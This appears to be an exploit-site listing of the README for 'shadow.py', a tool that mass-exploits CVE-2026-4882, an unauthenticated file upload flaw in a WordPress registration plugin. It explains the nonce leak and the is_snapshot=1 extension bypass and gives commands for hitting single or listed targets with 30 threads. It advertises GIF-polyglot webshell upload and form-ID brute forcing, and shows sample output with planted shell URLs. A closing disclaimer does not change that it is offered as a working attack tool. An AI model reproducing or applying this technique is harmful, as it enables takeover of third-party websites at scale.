Share
## https://sploitus.com/exploit?id=DD481546-AB6A-54AA-B91D-10A0FE3ADFA2
# CVE-2026-4882
User Registration Advanced Fields <= 1.6.20 - Unauthenticated Arbitrary File Upload
### Description :
User Registration Advanced Fields <= 1.6.20 - Unauthenticated Arbitrary File Upload
Description
The User Registration Advanced Fields plugin for WordPress (versions up to and including 1.6.20) is vulnerable to unauthenticated arbitrary file upload via the `uraf_profile_picture_upload_method_upload` AJAX action. The plugin leaks a valid nonce through `wp_localize_script()` on any page containing a registration form, and using the `is_snapshot=1` parameter bypasses file extension validation entirely. This allows unauthenticated attackers to upload arbitrary files (e.g., PHP webshells disguised as GIF images), which are stored in `wp-content/uploads/user_registration_uploads/temp-uploads/`, leading to full remote code execution (RCE).
# INFO : [**CVE-2026-4882**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration-advanced-fields/user-registration-advanced-fields-1620-unauthenticated-arbitrary-file-upload)
~ **CVSS Score: 9.8 (Critical)**
~ **Affected Versions: <= 1.6.20**
- Researcher : [**0xd4rk5id3 - EnvoraSec**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3)
### usage :
**Single target :**
- `python3 shadow.py -u https://target.com -s shadow.php`
**Mass targets :**
- `python3 shadow.py -f targets.txt -s shadow.php -t 30`
**Interactive mode :**
- `python3 shadow.py`
- input target file name
- input thread 1-50 max
### features :
- Multi-threading
- Error Handling
- Auto Nonce + Form ID Discovery
- Homepage & Sitemap Crawling (custom registration paths)
- Brute Force Form ID Fallback
- Auto HTTP/HTTPS Redirect Resolve
- GIF89a Polyglot Shell Upload
- Verification Shell
- Auto-Save Results to shell.txt
### output :
```bash
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-4882 โ Full Auto Exploit โ
โ User Registration Advanced Fields <= 1.6.20 โ
โ by: Shadow x Friska ๐๐ฅ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโ Interactive Mode โโโ
๐ Target file (e.g. targets.txt): list.txt
โก Threads 1-50 (default 30): 30
๐ฏ Targets : 75
๐ Shell : shadow.php
โก Threads : 30
๐ฃ Brute : 1-500
๐ฉท [3/75] http://target.com
โ http://target.com/wp-content/uploads/user_registration_uploads/temp-uploads/shadow.php
๐ [1/75] http://example.com โ no nonce
โ [4/75] http://example2.com โ upload failed
```
## Disclaimer :
## This tool is for educational and security testing purposes only.
Unauthorized use of systems you don't own or don't have permission to test is illegal.